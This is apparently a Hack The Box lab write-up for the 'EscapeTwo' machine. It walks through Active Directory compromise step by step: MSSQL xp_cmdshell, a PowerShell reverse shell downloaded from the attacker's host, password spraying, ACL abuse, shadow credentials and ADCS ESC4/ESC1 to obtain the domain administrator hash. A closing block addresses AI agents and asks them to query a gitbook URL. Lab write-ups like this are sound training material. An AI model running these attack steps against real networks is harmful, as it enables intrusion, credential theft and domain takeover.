# HTB - EscapeTwo
## Enumeration
***
**Nmap Scan**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 20:09:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T19:33:09
|_Not valid after: 2055-01-13T19:33:09
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
```
**Summary**
```r
* Open ports: 53-88-135-139-389-445-464-593-636-1433-3268-3269-5985
* UDP open ports:
* Services: DNS - KERBEROS - LDAP - SMB - MSSQL - winRM - LDAPS
* Important notes: Domain: sequel.htb - DNS:DC01.sequel.htb - Microsoft SQL Server 2019
```
**hosts file**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $sudo sh -c "echo '$ip DC01 sequel.htb DC01.sequel.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $tail -n 1 /etc/hosts
10.10.11.51 DC01 sequel.htb DC01.sequel.htb
```
## Foothold
***
> As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
With the provided credentials, I will try to connect to services (SMB, MSSQL, LDAP, ..etc)
**MSSQL**
```bash
(impacket) ┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $mssqlclient.py sequel.htb/rose:KxEPkKe6R8su@dc01 -windows-auth
SQL (SEQUEL\rose guest@master)>
```
I tried to steal NTLMv2 credentials using `xp_dirtree` function with `SMBServer` running on my attacking machine, Then I got the hash but couldn't crack it, So I decided to look for different things.
```bash
xp_dirtree \\10.10.16.75\file.txt
sudo impacket-smbserver -smb2support share $(pwd)
```
I moved then to dump LDAP data and begin to enumerate the domain with `bloodhound.py`
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ldapdomaindump ldap://$ip -u "sequel.htb\rose" -p 'KxEPkKe6R8su'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $bloodhound-python -u rose -p KxEPkKe6R8su -ns $ip -d sequel.htb -c all --zip
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
```
Also, I tried to get kerberoastable accounts, and I got two of them, but I couldn't crack their hashes, either.
It's worth nothing to Check for ADCS existence as it opens many avenues of we to find any misconfiguration associated with the templates
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nxc ldap 10.10.11.51 -u rose -p 'KxEPkKe6R8su' -M adcs
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.51 389 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
ADCS 10.10.11.51 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.51 389 DC01 Found PKI Enrollment Server: DC01.sequel.htb
ADCS 10.10.11.51 389 DC01 Found CN: sequel-DC01-CA
```
I looked for `SMB shares` using my credentials and found I have access to two shared folders:
In`Accounting Department`, there is `account.xlsx` file. First, I tried to open it with `Microsoft Excel` or any `xlsx` viewer but it said the file is corrupted.
Since `xlsx` can be treated as `zip` file, I unzipped it and began to look for any interesting info.
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $ls
accounting_2024.xlsx accounts.xlsx
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $unzip accounts.xlsx
Archive: accounts.xlsx
inflating: xl/workbook.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/sharedStrings.xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: docProps/custom.xml
inflating: [Content_Types].xml
```
Inside `xl/SharedStrings.xml`, there are several credentials
```r
Angela:0fwz7Q4mxxxxxx
0scar:86LxLBMxxxxxxx
kevin:Md9Wlq1xxxxxxxxx
sa:MSSQLP@xxxxxxx
```
## Lateral Movement
***
Using `sa` account, I can log in to the MSSQL instance as an admin
Impacket version `v0.12.0` has built-in commands to automate some attacks, I will use `enable_xp_cmdshell`
```bash
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
```
I will host PowerShell reverse shell on my web server and download it to the machine
To generate a reverse shell:
```bash
python3 /opt/PowerJoker/PowerJoker.py -l 10.10.16.84 -p 1337
```
Download and Execute the shell
```powershell
SQL (sa dbo@master)> xp_cmdshell powershell -c iwr http://10.10.16.84/shell.ps1 -o C:\programdata\rev.ps1
SQL (sa dbo@master)> xp_cmdshell powershell -c C:\programdata\rev.ps1
```
Receive Connection
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $rlwrap -cAr nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.84] from (UNKNOWN) [10.10.11.51] 54422
JokerShell C:\Windows\system32>
```
Under `C:\`, there is `SQL019` folder
```bash
JokerShell C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/5/2022 12:03 PM PerfLogs
d-r--- 1/4/2025 7:11 AM Program Files
d----- 6/9/2024 8:37 AM Program Files (x86)
d----- 6/8/2024 3:07 PM SQL2019
d-r--- 6/9/2024 6:42 AM Users
d----- 1/4/2025 8:10 AM Windows
```
I found `sql` configuration file, let's see its content
I found the credentials of `sql_svc` as which I'm running my shell
```powershell
JokerShell C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
..snip..
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6Cxxxxxxxxx"
```
With that password, I will try to spray other users in the system
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6xxxxxxxxxx'
*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
87443ae9f1bdec35xxxxxxxxxxxxxxxx
```
> User Flag: 87443ae9f1bdec35xxxxxxxxxxxxxxxx
## Privilege Escalation
***
I will use `powerview.py` to manually enumerate user's privileges
```bash
(powerview.py) ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $python3 /opt/powerview.py/powerview.py sequel.htb/ryan:'WqSZAF6Cyzzzzzzzz'@10.10.11.51
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Get-DomainUser -Identity ryan -Select ObjectSid
S-1-5-21-548670397-972687484-3496335370-1114
```
`Ryan` has `WriteOwner` on `Ca_svc`
With these privileges, I will Add `Ownership` to `Ryan`, then give him `fullcontrol` and after that, I can perform `Shadow Credentials`, `Reset Password` or `targeted Kerberosasting`
```powershell
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontrol
```
Get `NT` hash of `ca_svc` using `shadow credential` attack
With `ca_svc` hash, I can authenticate to the domain and begin to enumerate `ADCS`
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerable
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
..snip..
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
```
So, there is a template vulnerable to `ESC4`. That means I have permission to change the attribute associated with that template and make it vulnerable to `ESC1`
> `ESC1` is an escalation of misconfigured template is allowed to supply `subject alternative name` and can be abused to add any user of the domain (Administrator) to the template and get certificate for them.
```bash
certipy req -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5xxxxxxxxxxxxx7fce -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb
```
Get administrator hash
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb
[_] Using principal: administrator@sequel.htb
[_] Trying to get TGT...
[_] Got TGT
[_] Saved credential cache to 'administrator.ccache'
[_] Trying to retrieve NT hash for 'administrator'
[_] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed40xxxxxxxxxxxx
```
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u administrator -H 7a8d4e04986afa8ed40xxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
eff768f0b89d396c3xxxxxxxxxxxxxxxxxx
```
> Root Flag: eff768f0b89d396c3xxxxxxxxxxxxxxxxxx
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/easy/htb-escapetwo.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.